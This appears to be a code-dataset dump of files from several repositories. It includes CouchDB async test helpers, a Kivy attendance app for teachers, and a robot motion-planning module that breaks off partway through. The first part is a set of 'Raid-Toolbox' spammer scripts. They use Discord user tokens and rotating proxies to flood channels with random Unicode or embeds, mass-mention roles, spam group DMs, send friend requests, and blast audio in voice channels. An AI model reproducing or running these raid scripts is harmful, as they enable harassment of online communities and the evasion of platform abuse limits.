metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "00-00-00-11/Raid-Toolbox",
"score": 2
} |
#### File: Raid-Toolbox/spammer/asciispam.py
```python
import discord
import random
import sys
import aiohttp
token = sys.argv[1]
tokenno = sys.argv[2]
textchan = sys.argv[3]
allchan = sys.argv[4]
SERVER = sys.argv[5]
useproxies = sys.argv[6]
if useproxies == 'True':
proxy_list = open("proxies.txt").read().splitlines()
proxy = random.choice(proxy_list)
con = aiohttp.ProxyConnector(proxy="http://"+proxy)
client = discord.Client(connector=con)
else:
client = discord.Client()
@client.event
async def on_ready():
server = client.get_guild(int(SERVER))
if allchan == 'true':
while not client.is_closed():
for channel in server.text_channels:
myperms = channel.permissions_for(server.get_member(client.user.id))
if not myperms.send_messages:
continue
asc = ''
for x in range(1999):
num = random.randrange(13000)
asc = asc + chr(num)
try:
await channel.send(asc)
except Exception:
pass
else:
txtchan = client.get_channel(int(textchan))
while not client.is_closed():
asc = ''
for x in range(1999):
num = random.randrange(13000)
asc = asc + chr(num)
try:
await txtchan.send(asc)
except Exception:
pass
try:
client.run(token, bot=False)
except Exception as c:
print (c)
```
#### File: Raid-Toolbox/spammer/embedspam.py
```python
import discord
import sys
import random
import aiohttp
token = sys.argv[1]
title = sys.argv[2]
author = sys.argv[3]
iconurl = sys.argv[4]
thumburl = sys.argv[5]
footer = sys.argv[6]
textchan = sys.argv[7]
useproxies = sys.argv[8]
if useproxies == 'True':
proxy_list = open("proxies.txt").read().splitlines()
proxy = random.choice(proxy_list)
con = aiohttp.ProxyConnector(proxy="http://"+proxy)
client = discord.Client(connector=con)
else:
client = discord.Client()
# set embed
embed=discord.Embed(title=title)
embed.set_author(name=author, icon_url=iconurl)
embed.set_thumbnail(url=thumburl)
embed.set_footer(text=footer)
@client.event
async def on_ready():
try:
txtchan = client.get_channel(int(textchan))
while True:
await txtchan.send(embed=embed)
except Exception:
pass
try:
client.run(token, bot=False)
except Exception as c:
print (c)
```
#### File: Raid-Toolbox/spammer/friender.py
```python
import sys
import requests
import random
token = sys.argv[1]
userid = sys.argv[2]
useproxies = sys.argv[3]
if useproxies == 'True':
proxy_list = open("proxies.txt").read().splitlines()
def proxyfriend():
try:
proxy = random.choice(proxy_list)
requests.put(apilink, headers=headers, proxies={"http": proxy, "https": proxy})
except Exception:
proxyfriend()
apilink = 'https://discordapp.com/api/v6/users/@me/relationships/'+ str(userid)
headers={
'Authorization': token,
'Content-Type': 'application/json'
}
if useproxies == 'True':
proxyfriend()
else:
requests.put(apilink, headers=headers)
```
#### File: Raid-Toolbox/spammer/groupdmspam.py
```python
import discord
import sys
import random
import aiohttp
import logging
token = sys.argv[1]
group = sys.argv[2]
tokenno = sys.argv[3]
msgtxt = sys.argv[4]
useproxies = sys.argv[5]
logging.basicConfig(filename='RTB.log', filemode='w', format='Token {}'.format(str(tokenno))+' - %(levelname)s - %(message)s',level=logging.CRITICAL)
if useproxies == 'True':
proxy_list = open("proxies.txt").read().splitlines()
proxy = random.choice(proxy_list)
con = aiohttp.ProxyConnector(proxy="http://"+proxy)
client = discord.Client(connector=con)
else:
client = discord.Client()
@client.event
async def on_ready():
groupdm = client.get_channel(int(group))
while not client.is_closed():
try:
await groupdm.send(msgtxt)
except Exception:
pass
try:
client.run(token, bot=False)
except Exception as c:
logging.critical('Token {} Unable to login: {}'.format(str(tokenno),str(c)))
print (c)
```
#### File: Raid-Toolbox/spammer/rolemention.py
```python
import discord
import sys
import random
import aiohttp
useproxies = sys.argv[4]
if useproxies == 'True':
proxy_list = open("proxies.txt").read().splitlines()
proxy = random.choice(proxy_list)
con = aiohttp.ProxyConnector(proxy="http://"+proxy)
client = discord.Client(connector=con)
else:
client = discord.Client()
token = sys.argv[1]
SERVER = sys.argv[2]
tokenno = sys.argv[3]
@client.event
async def on_ready():
server = client.get_guild(int(SERVER))
mention = ''
try:
for role in server.roles:
if role.mentionable:
mention += role.mention + ' '
else:
continue
while not client.is_closed():
for channel in server.text_channels:
myperms = channel.permissions_for(server.get_member(client.user.id))
if not myperms.send_messages:
continue
for m in [mention[i:i+1999] for i in range(0, len(mention), 1999)]:
try:
await channel.send(m)
except Exception:
pass
except Exception as e:
print (e)
pass
try:
client.run(token, bot=False)
except Exception as c:
print (c)
```
#### File: Raid-Toolbox/spammer/trafficlight.py
```python
import discord
import asyncio
import random
import sys
import aiohttp
useproxies = sys.argv[2]
if useproxies == 'True':
proxy_list = open("proxies.txt").read().splitlines()
proxy = random.choice(proxy_list)
con = aiohttp.ProxyConnector(proxy="http://"+proxy)
client = discord.Client(connector=con)
else:
client = discord.Client()
token = sys.argv[1]
@client.event
async def on_ready():
while not client.is_closed():
randoms = ['1','2','3']
presence = (random.choice(randoms))
if presence == '1':
await client.change_presence(status=discord.Status.online)
await asyncio.sleep(3)
elif presence == '2':
await client.change_presence(status=discord.Status.idle)
await asyncio.sleep(3)
elif presence == '3':
await client.change_presence(status=discord.Status.do_not_disturb)
await asyncio.sleep(3)
try:
client.run(token, bot=False)
except Exception as c:
print (c)
```
#### File: Raid-Toolbox/spammer/vcspam.py
```python
import discord
import asyncio
import sys
import random
import aiohttp
token = sys.argv[1]
tokenno = sys.argv[2]
voice_id = sys.argv[3]
useproxies = sys.argv[4] # proxies for voice chats smh
if useproxies == 'True':
proxy_list = open("proxies.txt").read().splitlines()
proxy = random.choice(proxy_list)
con = aiohttp.ProxyConnector(proxy="http://"+proxy)
client = discord.Client(connector=con)
else:
client = discord.Client()
@client.event
async def on_ready():
await asyncio.sleep(1)
voice_channel = client.get_channel(int(voice_id))
while not client.is_closed():
vc = await voice_channel.connect()
vc.play(discord.FFmpegPCMAudio('spammer/file.wav'))
vc.source = discord.PCMVolumeTransformer(vc.source)
vc.source.volume = 10.0
while vc.is_playing():
await asyncio.sleep(3)
await vc.disconnect(force=True)
try:
client.run(token, bot=False)
except Exception as c:
print(c)
``` |
{
"source": "00000111/aiocouchdb",
"score": 2
} |
#### File: aiocouchdb/tests/utils.py
```python
import asyncio
import base64
import contextlib
import datetime
import functools
import os
import random
import unittest
import unittest.mock as mock
import uuid as _uuid
from collections import deque, defaultdict
import aiocouchdb.client
import aiocouchdb.errors
from aiocouchdb.client import urljoin, extract_credentials
from yarl import URL
TARGET = os.environ.get('AIOCOUCHDB_TARGET', 'mock')
def run_in_loop(f):
@functools.wraps(f)
def wrapper(testcase, *args, **kwargs):
coro = asyncio.coroutine(f)
future = asyncio.wait_for(coro(testcase, *args, **kwargs),
timeout=testcase.timeout)
return testcase.loop.run_until_complete(future)
return wrapper
class MetaAioTestCase(type):
def __new__(cls, name, bases, attrs):
for key, obj in attrs.items():
if key.startswith('test_'):
attrs[key] = run_in_loop(obj)
return super().__new__(cls, name, bases, attrs)
class TestCase(unittest.TestCase, metaclass=MetaAioTestCase):
_test_target = TARGET
timeout = 10
url = URL('http://localhost:5984')
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
wraps = None
if self._test_target != 'mock':
wraps = self._request_tracer(aiocouchdb.client.request)
self._patch = mock.patch('aiocouchdb.client.request', wraps=wraps)
self.request = self._patch.start()
self._set_response(self.prepare_response())
self._req_per_task = defaultdict(list)
self.loop.run_until_complete(self.setup_env())
def tearDown(self):
self.loop.run_until_complete(self.teardown_env())
self._patch.stop()
self.loop.close()
@asyncio.coroutine
def setup_env(self):
sup = super()
if hasattr(sup, 'setup_env'):
yield from sup.setup_env()
@asyncio.coroutine
def teardown_env(self):
sup = super()
if hasattr(sup, 'teardown_env'):
yield from sup.teardown_env()
def future(self, obj):
fut = asyncio.Future(loop=self.loop)
fut.set_result(obj)
return fut
def _request_tracer(self, f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
current_task = asyncio.Task.current_task(loop=self.loop)
self._req_per_task[current_task].append((args, kwargs))
return f(*args, **kwargs)
return wrapper
def prepare_response(self, *,
cookies=None,
data=b'',
err=None,
headers=None,
status=200):
def make_side_effect(queue):
def side_effect(*args, **kwargs):
fut = asyncio.Future(loop=self.loop)
if queue:
resp.content.at_eof.return_value = False
fut.set_result(queue.popleft())
elif err:
fut.set_exception(err)
else:
resp.content.at_eof.return_value = True
fut.set_result(b'')
return fut
return side_effect
headers = headers or {}
headers.setdefault('CONTENT-TYPE', 'application/json')
cookies = cookies or {}
if isinstance(data, list):
chunks_queue = deque(data)
lines_queue = deque((b''.join(data)).splitlines(keepends=True))
else:
chunks_queue = deque([data])
lines_queue = deque(data.splitlines(keepends=True))
resp = aiocouchdb.client.HttpResponse('', '')
resp._post_init(self.loop)
resp.status = status
resp.headers = headers
resp.cookies = cookies
resp.content = unittest.mock.Mock()
resp.content._buffer = bytearray()
resp.content.at_eof.return_value = False
resp.content.read.side_effect = make_side_effect(chunks_queue)
resp.content.readany.side_effect = make_side_effect(chunks_queue)
resp.content.readline.side_effect = make_side_effect(lines_queue)
resp.close = mock.Mock(side_effect=resp.close)
return resp
@contextlib.contextmanager
def response(self, *,
cookies=None,
data=b'',
err=None,
headers=None,
status=200):
resp = self.prepare_response(cookies=cookies,
data=data,
err=err,
headers=headers,
status=status)
self._set_response(resp)
yield resp
resp.close()
self._set_response(self.prepare_response())
def _set_response(self, resp):
if self._test_target == 'mock':
self.request.return_value = self.future(resp)
def assert_request_called_with(self, method, *path, **kwargs):
self.assertTrue(self.request.called and self.request.call_count >= 1)
current_task = asyncio.Task.current_task(loop=self.loop)
if current_task in self._req_per_task:
call_args, call_kwargs = self._req_per_task[current_task][-1]
else:
call_args, call_kwargs = self.request.call_args
self.assertEqual((method, urljoin(self.url, *path)), call_args)
kwargs.setdefault('data', None)
kwargs.setdefault('headers', {})
kwargs.setdefault('params', {})
for key, value in kwargs.items():
self.assertIn(key, call_kwargs)
if value is not Ellipsis:
self.assertEqual(value, call_kwargs[key])
class ServerTestCase(TestCase):
server_class = None
url = os.environ.get('AIOCOUCHDB_URL', 'http://localhost:5984')
@asyncio.coroutine
def setup_env(self):
self.url, creds = extract_credentials(self.url)
self.server = self.server_class(self.url, loop=self.loop)
if creds is not None:
self.cookie = yield from self.server.session.open(*creds)
else:
self.cookie = None
sup = super()
if hasattr(sup, 'setup_env'):
yield from sup.setup_env()
@asyncio.coroutine
def teardown_env(self):
sup = super()
if hasattr(sup, 'teardown_env'):
yield from sup.teardown_env()
class DatabaseTestCase(ServerTestCase):
database_class = None
def new_dbname(self):
return dbname(self.id().split('.')[-1])
@asyncio.coroutine
def setup_env(self):
yield from super().setup_env()
dbname = self.new_dbname()
self.url_db = urljoin(self.url, dbname)
self.db = self.database_class(
self.url_db, dbname=dbname, loop=self.loop)
yield from self.setup_database(self.db)
@asyncio.coroutine
def setup_database(self, db):
with self.response(data=b'{"ok": true}'):
yield from db.create()
@asyncio.coroutine
def teardown_env(self):
yield from self.teardown_database(self.db)
yield from super().teardown_env()
@asyncio.coroutine
def teardown_database(self, db):
with self.response(data=b'{"ok": true}'):
try:
yield from db.delete()
except aiocouchdb.errors.ResourceNotFound:
pass
class DocumentTestCase(DatabaseTestCase):
document_class = None
@asyncio.coroutine
def setup_env(self):
yield from super().setup_env()
docid = uuid()
self.url_doc = urljoin(self.db.resource.url, docid)
self.doc = self.document_class(
self.url_doc, docid=docid, loop=self.loop)
yield from self.setup_document(self.doc)
@asyncio.coroutine
def setup_document(self, doc):
with self.response(data=b'{"rev": "1-ABC"}'):
resp = yield from doc.update({})
self.rev = resp['rev']
class DesignDocumentTestCase(DatabaseTestCase):
designdoc_class = None
@asyncio.coroutine
def setup_env(self):
yield from super().setup_env()
docid = '_design/' + uuid()
self.url_ddoc = urljoin(self.db.resource.url, *docid.split('/'))
self.ddoc = self.designdoc_class(
self.url_ddoc, docid=docid, loop=self.loop)
yield from self.setup_document(self.ddoc)
@asyncio.coroutine
def setup_document(self, ddoc):
with self.response(data=b'{"rev": "1-ABC"}'):
resp = yield from ddoc.doc.update({
'views': {
'viewname': {
'map': 'function(doc){ emit(doc._id, null) }'
}
}
})
self.rev = resp['rev']
class AttachmentTestCase(DocumentTestCase):
attachment_class = None
@asyncio.coroutine
def setup_env(self):
yield from super().setup_env()
self.attbin = self.attachment_class(
urljoin(self.doc.resource.url, 'binary'),
name='binary')
self.atttxt = self.attachment_class(
urljoin(self.doc.resource.url, 'text'),
name='text')
self.url_att = self.attbin.resource.url
@asyncio.coroutine
def setup_document(self, doc):
with self.response(data=b'{"rev": "1-ABC"}'):
resp = yield from doc.update({
'_attachments': {
'binary': {
'data': base64.b64encode(b'Time to relax!').decode(),
'content_type': 'application/octet-stream'
},
'text': {
'data': base64.b64encode(b'Time to relax!').decode(),
'content_type': 'text/plain'
}
}
})
self.rev = resp['rev']
def modify_server(section, option, value):
assert section != 'admins', 'use `with_fixed_admin_party` decorator'
@asyncio.coroutine
def apply_config_changes(server, cookie):
oldval = yield from server.config.update(section, option, value,
auth=cookie)
return oldval
@asyncio.coroutine
def revert_config_changes(server, cookie, oldval):
if not oldval:
try:
yield from server.config.delete(section, option, auth=cookie)
except aiocouchdb.errors.ResourceNotFound:
pass
else:
if not (yield from server.config.exists(section, option)):
return
oldval = yield from server.config.update(section, option, oldval,
auth=cookie)
assert oldval == value, ('{} != {}'.format(oldval, value))
def decorator(f):
@functools.wraps(f)
def wrapper(testcase, **kwargs):
server, cookie = testcase.server, testcase.cookie
oldval = yield from apply_config_changes(server, cookie)
try:
yield from f(testcase, **kwargs)
finally:
yield from revert_config_changes(server, cookie, oldval)
return wrapper
return decorator
def with_fixed_admin_party(username, password):
@asyncio.coroutine
def apply_config_changes(server, cookie):
oldval = yield from server.config.update('admins', username, password,
auth=cookie)
cookie = yield from server.session.open(username, password)
return oldval, cookie
@asyncio.coroutine
def revert_config_changes(server, cookie, oldval):
if not oldval:
try:
yield from server.config.delete('admins', username, auth=cookie)
except aiocouchdb.errors.ResourceNotFound:
pass
else:
yield from server.config.update('admins', username, oldval,
auth=cookie)
def decorator(f):
@functools.wraps(f)
def wrapper(testcase, **kwargs):
server, cookie = testcase.server, testcase.cookie
oldval, cookie = yield from apply_config_changes(server, cookie)
if cookie is not None:
kwargs[username] = cookie
try:
yield from f(testcase, **kwargs)
finally:
yield from revert_config_changes(server, cookie, oldval)
return wrapper
return decorator
def using_database(dbarg='db'):
@asyncio.coroutine
def create_database(server, cookie):
db = server[dbname()]
yield from db.create(auth=cookie)
return db
@asyncio.coroutine
def drop_database(db, cookie):
try:
yield from db.delete(auth=cookie)
except aiocouchdb.errors.ResourceNotFound:
pass
def decorator(f):
@functools.wraps(f)
def wrapper(testcase, **kwargs):
server, cookie = testcase.server, testcase.cookie
with testcase.response(data=b'{"ok": true}'):
db = yield from create_database(server, cookie)
assert dbarg not in kwargs, \
'conflict: both {} and {} are referenced as {}'.format(
db, kwargs[dbarg], dbarg
)
kwargs[dbarg] = db
try:
yield from f(testcase, **kwargs)
finally:
with testcase.response(data=b'{"ok": true}'):
yield from drop_database(db, cookie)
return wrapper
return decorator
@asyncio.coroutine
def populate_database(db, docs_count):
def generate_docs(count):
for _ in range(count):
dt = datetime.datetime.fromtimestamp(
random.randint(1234567890, 2345678901)
)
dta = [dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second]
doc = {
'_id': uuid(),
'created_at': dta,
'num': random.randint(0, 10),
'type': random.choice(['a', 'b', 'c'])
}
yield doc
if not (yield from db.exists()):
yield from db.create()
docs = list(generate_docs(docs_count))
updates = yield from db.bulk_docs(docs)
mapping = {doc['_id']: doc for doc in docs}
if not updates:
return {}
for update in updates:
mapping[update['id']]['_rev'] = update['rev']
return mapping
def uuid():
return _uuid.uuid4().hex
def dbname(idx=None, prefix='test/aiocouchdb'):
if idx:
return '/'.join((prefix, idx, uuid()))
else:
return '/'.join((prefix, uuid()))
def run_for(*targets):
def decorator(f):
@functools.wraps(f)
@unittest.skipIf(TARGET not in targets,
'runs only for targets: %s' % ', '.join(targets))
def wrapper(*args, **kwargs):
return f(*args, **kwargs)
return wrapper
return decorator
def skip_for(*targets):
def decorator(f):
@functools.wraps(f)
@unittest.skipIf(TARGET in targets,
'skips for targets: %s' % ', '.join(targets))
def wrapper(*args, **kwargs):
return f(*args, **kwargs)
return wrapper
return decorator
``` |
{
"source": "0000Blaze/Smart-Attendance",
"score": 2
} |
#### File: Smart-Attendance/teacherApp/teacher.py
```python
from server import client_teacher
from numpy import spacing
from kivymd.app import MDApp
from kivymd.uix.boxlayout import MDBoxLayout
from kivymd.uix.button import MDRaisedButton
from kivymd.uix.label import MDLabel
from kivy.uix.image import Image
from kivymd.uix.textfield import MDTextField
from kivymd.uix.datatables import MDDataTable
from kivy.metrics import dp
from kivy.uix.screenmanager import ScreenManager, Screen
class LoginWindow(Screen):
pass
class AttendanceWindow(Screen):
pass
cardColor = [0.796875, 0.8984375, 0.99609375, 1]
textColor = [0, 0, 0, 1]
backgroundColor = [0.59765625, 0.8046875, 0.99609375, 1]
sm = ScreenManager()
sm.add_widget(LoginWindow(name="login"))
sm.add_widget(AttendanceWindow(name="attendance"))
class MainApp(MDApp):
teacherId = ""
classId = ""
className = ""
classList = []
subjectId = ""
subjectname = ""
subjectList = []
attendanceId = ""
attendanceList = {}
attendanceToBeDone = []
attendanceListMini = []
data_tables = None
stop_btn = None
present_btn = None
def __init__(self, **kwargs):
self.title = "Smart Attendance"
super().__init__(**kwargs)
def build(self):
loginBg = MDBoxLayout()
loginBg.md_bg_color = backgroundColor
imageLayout = MDBoxLayout(size_hint=(0.15, 0.15),
pos_hint={'center_x': .5, 'center_y': .9})
imageObj = Image(source="./assets/icon.png")
imageLayout.add_widget(imageObj)
smallCard = MDBoxLayout()
smallCard.md_bg_color = cardColor
smallCard.size_hint = (0.5, 0.65)
smallCard.radius = [40, 40, 40, 40]
smallCard.orientation = "vertical"
smallCard.pos_hint = {'center_x': .5, 'center_y': .5}
teacherIDBox = MDBoxLayout()
teacherIDBox.pos_hint = {'center_x': .5, 'center_y': .5}
teacherIDBox.orientation = 'vertical'
teacherIDBox.adaptive_height = True
teacherIDBox.size_hint = (0.5, 1.0)
self.teacherIDInp = MDTextField(hint_text="Teacher Id:")
self.teacherIDInp.color_mode = "custom"
self.teacherIDInp.line_color_normal = textColor
self.teacherIDInp.line_color_focus = textColor
self.teacherIDInp.hint_text_color = textColor
self.teacherIDInp.pos_hint = {'center_x': .5, 'center_y': .2}
self.classIDInp = MDTextField(hint_text="Class Id:")
self.classIDInp.hint_text = "Class Id:"
self.classIDInp.color_mode = "custom"
self.classIDInp.line_color_normal = textColor
self.classIDInp.line_color_focus = textColor
self.classIDInp.hint_text_color = textColor
self.classIDInp.pos_hint = {'center_x': .5, 'center_y': .2}
teacherIDLabel = MDLabel(text="Teacher Id:")
teacherIDLabel.size_hint = (1, 0.2)
classIDLabel = MDLabel(text="Class Id:")
classIDLabel.size_hint = (1, 0.2)
teacherIDBox.add_widget(teacherIDLabel)
teacherIDBox.add_widget(self.teacherIDInp)
teacherIDBox.add_widget(classIDLabel)
teacherIDBox.add_widget(self.classIDInp)
connectButton = MDRaisedButton(text="Connect")
connectButton.pos_hint = {'center_x': .5, 'center_y': .5}
connectButton.bind(on_press=self.connectCallback)
subjectNameLayout = MDBoxLayout(orientation="vertical")
subjectNameLayout.pos_hint = {'center_x': .5, 'center_y': .5}
subjectNameLayout.size_hint = (0.65, 0.5)
subjectNameLayout.adaptive_height = True
self.teacherName = MDLabel(pos_hint={'center_x': .5, 'center_y': .5})
self.teacherName.text = ""
self.subjectName = MDLabel(pos_hint={'center_x': .5, 'center_y': .5})
self.subjectName.text = "No Connection"
subjectNameLayout.add_widget(self.teacherName)
subjectNameLayout.add_widget(self.subjectName)
startButton = MDRaisedButton(text="Start")
startButton.pos_hint = {'center_x': .5, 'center_y': .5}
startButton.bind(on_release=self.startCallback)
smallCard.add_widget(teacherIDBox)
smallCard.add_widget(connectButton)
smallCard.add_widget(subjectNameLayout)
smallCard.add_widget(startButton)
smallCard.add_widget(MDLabel(size_hint=(1, 0.2)))
loginScreen = sm.get_screen("login")
loginScreen.add_widget(loginBg)
loginScreen.add_widget(imageLayout)
loginScreen.add_widget(smallCard)
###########################################################################
attendanceBg = MDBoxLayout()
attendanceBg.md_bg_color = backgroundColor
attendanceBox = MDBoxLayout(orientation="vertical")
attendanceBox.pos_hint = {"center_x": .5, "center_y": .9}
attendanceBox.size_hint = (0.9, 0.2)
# attendanceBox.adaptive_height = True
# attendanceBox = MDBoxLayout(spacing="40dp")
# attendanceBox.md_bg_color = [1, 0, 0, 1]
attendanceInnerBox1 = MDBoxLayout(orientation="horizontal")
attendanceInnerBox1.size_hint = (1, 0.5)
self.attendanceTextLabel = MDLabel(
text="Attendance will time out in 10 minutes")
backButton = MDRaisedButton(text="Back")
backButton.bind(on_press=self.backCallback)
attendanceInnerBox2 = MDBoxLayout(orientation="horizontal")
attendanceInnerBox2.size_hint = (1, 0.5)
self.attendanceCodeLabel = MDLabel(text="Attendance Code :")
refreshButton = MDRaisedButton(text="Refresh")
refreshButton.bind(on_press=self.refreshCallback)
attendanceInnerBox1.add_widget(self.attendanceTextLabel)
attendanceInnerBox1.add_widget(backButton)
attendanceInnerBox2.add_widget(self.attendanceCodeLabel)
attendanceInnerBox2.add_widget(refreshButton)
attendanceBox.add_widget(attendanceInnerBox1)
attendanceBox.add_widget(attendanceInnerBox2)
# stopAttendanceButton = MDRaisedButton(text="Stop Attendance")
# stopAttendanceButton.bind(on_press=self.stopAttendanceCallback)
attendanceScreen = sm.get_screen("attendance")
attendanceScreen.add_widget(attendanceBg)
attendanceScreen.add_widget(attendanceBox)
# attendanceScreen.add_widget(stopAttendanceButton)
return sm
def getSubject(self):
try:
subjectListFromServer = client_teacher.updateClassAndSubjects(
self.teacherId)
# # get subject list of each class teached by teacher
# for i in subjectListFromServer["subject"]:
# self.subjectList.append(i)
# print(subjectList)
if "error" not in subjectListFromServer:
# print(subjectListFromServer["teacher_name"])
self.subjectId = subjectListFromServer["subject"][0][0]
self.subjectname = subjectListFromServer["subject"][0][1]
self.teacherName.text = str(
"Welcome, ") + str(subjectListFromServer["teacher_name"])
# print(self.subjectId)
except Exception as e:
print("Subject retrival error", e)
pass
def startAttendanceSheet(self):
try:
AttendanceListFromServer = client_teacher.startAttendance(
self.teacherId, self.classId, self.subjectId)
print(self.teacherId, self.classId, self.subjectId)
if "error" in AttendanceListFromServer:
print(AttendanceListFromServer["error"])
self.attendanceTextLabel.text = AttendanceListFromServer["error"]
else:
# save attendance code
self.attendanceId = AttendanceListFromServer["acode"]
for list in AttendanceListFromServer["student_list"]:
#print(list[0], list[1])
presence = "Absent"
presenceList = [list[1], presence]
self.attendanceList[list[0]] = presenceList
print(AttendanceListFromServer["timeout"])
self.attendanceTextLabel.text = AttendanceListFromServer["timeout"]
except Exception as e:
print("error :", e)
def updateAttendanceSheet(self):
try:
AttendanceListFromServer = client_teacher.getAttendance(
self.teacherId, self.classId)
if "error" in AttendanceListFromServer:
print(AttendanceListFromServer["error"])
else:
# update presence in list
keys = AttendanceListFromServer["student_list"]
# print(keys)
for key in keys:
self.attendanceList[key][1] = "Present"
self.widgetRemover() # removes old instance of datatable,stop and present button
attendanceScreen = sm.get_screen("attendance")
# adds data table , stop and present button
self.load_table(attendanceScreen)
except Exception as e:
print(e)
def finalAttendanceSheet(self, *args):
try:
AttendanceListFromServer = client_teacher.stopAttendance(
self.teacherId, self.classId)
if "error" in AttendanceListFromServer:
print(AttendanceListFromServer["error"])
self.attendanceTextLabel.text = AttendanceListFromServer["error"]
else:
print(AttendanceListFromServer["success"])
self.attendanceTextLabel.text = AttendanceListFromServer["success"]
except Exception as e:
print(e)
def manualPresent(self, *args):
try:
for text in self.attendanceToBeDone:
print("Done presence", text)
client_teacher.markAttendance(
self.teacherId, self.classId, text)
except:
print("some error occured during manual attendance")
# empty selected check for presence
while len(self.attendanceToBeDone) > 0:
self.attendanceToBeDone.pop()
# print("After",self.attendanceToBeDone)
self.updateAttendanceSheet()
def startCallback(self, *args):
self.startAttendanceSheet()
self.attendanceCodeLabel.text = "Attendance Code: " + \
str(self.attendanceId)
sm.current = "attendance"
attendanceScreen = sm.get_screen("attendance")
self.load_table(attendanceScreen)
def connectCallback(self, *args):
self.classIDInp.text = self.classIDInp.text.upper()
self.teacherId = self.teacherIDInp.text
self.classId = self.classIDInp.text
self.getSubject()
# print("searching subject for", self.teacherID, self.classID)
self.subjectName.text = str(self.subjectname)
def stopAttendanceCallback(self, *args):
self.finalAttendanceSheet()
self.attendanceCodeLabel.text = "Attendance Code: "
pass
def backCallback(self, *args):
sm.current = "login"
def refreshCallback(self, *args):
self.updateAttendanceSheet()
self.widgetRemover()
aScreen = sm.get_screen("attendance")
self.load_table(aScreen)
def stopCallback(self, *args):
self.finalAttendanceSheet()
pass
def presentCallback(self, *args):
self.manualPresent()
attendanceScreen = sm.get_screen("attendance")
self.widgetRemover()
self.load_table(attendanceScreen)
pass
def load_table(self, aScreen):
# list to make attendance list a list for initial insert in data table
AttendListMini = []
for key in self.attendanceList:
AttendListMini.append(key)
AttendListMini.append(self.attendanceList[key][0])
AttendListMini.append(self.attendanceList[key][1])
self.data_tables = MDDataTable(
pos_hint={'center_y': 0.5, 'center_x': 0.5},
size_hint=(0.7, 0.6),
rows_num=48,
check=True,
# use_pagination=True,
column_data=[
("Roll Number", dp(40)),
("Student", dp(30)),
("Presence", dp(30)), ],
row_data=[
(AttendListMini[i*3], AttendListMini[(i*3)+1],
AttendListMini[(i*3)+2])
for i in range(int(len(AttendListMini)/3))
# (f"{i + 1}", "2.23", "3.65")
# for i in range(50)
],
)
self.data_tables.bind(on_check_press=self.check_press)
self.stop_btn = MDRaisedButton(
text="Stop",
pos_hint={'center_y': 0.1, 'center_x': 0.6}
)
self.stop_btn.bind(on_press=self.stopCallback)
self.present_btn = MDRaisedButton(
text="Mark Present",
pos_hint={'center_y': 0.1, 'center_x': 0.3}
)
self.present_btn.bind(on_press=self.presentCallback)
aScreen.add_widget(self.data_tables)
aScreen.add_widget(self.stop_btn)
aScreen.add_widget(self.present_btn)
# return layout
def check_press(self, instance_table, current_row):
print(current_row)
self.attendanceToBeDone.append(current_row[0])
def widgetRemover(self):
attendanceScreen = sm.get_screen("attendance")
attendanceScreen.remove_widget(self.data_tables)
attendanceScreen.remove_widget(self.stop_btn)
attendanceScreen.remove_widget(self.present_btn)
# attendanceScreen.clear_widgets()
# attendanceScreen.add_widget(MDLabel(text="hi ravi"))
if __name__ == "__main__":
MainApp().run()
``` |
{
"source": "0000duck/MPlib",
"score": 3
} |
#### File: MPlib/mplib/planner.py
```python
from typing import Sequence, Tuple, Union
import os
import numpy as np
from transforms3d.quaternions import quat2mat
import toppra
import toppra as ta
import toppra.constraint as constraint
import toppra.algorithm as algo
from .pymp import *
class Planner:
"""Motion planner."""
# TODO(jigu): default joint vel and acc limits
# TODO(jigu): how does user link names and joint names are exactly used?
def __init__(
self,
urdf: str,
user_link_names: Sequence[str],
user_joint_names: Sequence[str],
move_group: str,
joint_vel_limits: Union[Sequence[float], np.ndarray],
joint_acc_limits: Union[Sequence[float], np.ndarray],
srdf: str = ""
):
r"""Motion planner for robots.
Args:
urdf: Unified Robot Description Format file.
user_link_names: names of links, the order
user_joint_names: names of the joints to plan
move_group: target link to move, usually the end-effector.
joint_vel_limits: maximum joint velocities for time parameterization,
which should have the same length as
joint_acc_limits: maximum joint accelerations for time parameterization,
which should have the same length as
srdf: Semantic Robot Description Format file.
References:
http://docs.ros.org/en/kinetic/api/moveit_tutorials/html/doc/urdf_srdf/urdf_srdf_tutorial.html
"""
self.urdf = urdf
if srdf == "" and os.path.exists(urdf.replace(".urdf", ".srdf")):
srdf = urdf.replace(".urdf", ".srdf")
print("No SRDF file provided. Try to load %s." % srdf)
self.srdf = srdf
self.user_link_names = user_link_names
self.user_joint_names = user_joint_names
self.joint_name_2_idx = {}
for i, joint in enumerate(self.user_joint_names):
self.joint_name_2_idx[joint] = i
self.link_name_2_idx = {}
for i, link in enumerate(self.user_link_names):
self.link_name_2_idx[link] = i
self.robot = articulation.ArticulatedModel(
urdf,
srdf,
[0, 0, -9.81],
self.user_joint_names,
self.user_link_names,
verbose=False,
convex=True,
)
self.pinocchio_model = self.robot.get_pinocchio_model()
self.planning_world = planning_world.PlanningWorld(
[self.robot], ["robot"], [], []
)
if srdf == "":
self.generate_collision_pair()
self.robot.update_SRDF(self.srdf)
assert(move_group in self.user_link_names)
self.move_group = move_group
self.robot.set_move_group(self.move_group)
self.move_group_joint_indices = (
self.robot.get_move_group_joint_indices()
)
self.joint_types = self.pinocchio_model.get_joint_types()
self.joint_limits = np.concatenate(
self.pinocchio_model.get_joint_limits()
)
self.planner = ompl.OMPLPlanner(world=self.planning_world)
self.joint_vel_limits = joint_vel_limits
self.joint_acc_limits = joint_acc_limits
self.move_group_link_id = self.link_name_2_idx[self.move_group]
assert len(self.joint_vel_limits) == len(
self.move_group_joint_indices
), len(self.move_group_joint_indices)
assert len(self.joint_acc_limits) == len(self.move_group_joint_indices)
def generate_collision_pair(self, sample_time = 1000000, echo_freq = 100000):
print("Since no SRDF file is provided. We will first detect link pairs that will always collide. This may take several minutes.")
n_link = len(self.user_link_names)
cnt = np.zeros((n_link, n_link), dtype=np.int32)
for i in range(sample_time):
qpos = self.pinocchio_model.get_random_configuration()
self.robot.set_qpos(qpos, True)
collisions = self.planning_world.collide_full()
for collision in collisions:
u = self.link_name_2_idx[collision.link_name1]
v = self.link_name_2_idx[collision.link_name2]
cnt[u][v] += 1
if i % echo_freq == 0:
print("Finish %.1f%%!" % (i * 100 / sample_time))
import xml.etree.ElementTree as ET
from xml.dom import minidom
root = ET.Element('robot')
robot_name = self.urdf.split('/')[-1].split('.')[0]
root.set('name', robot_name)
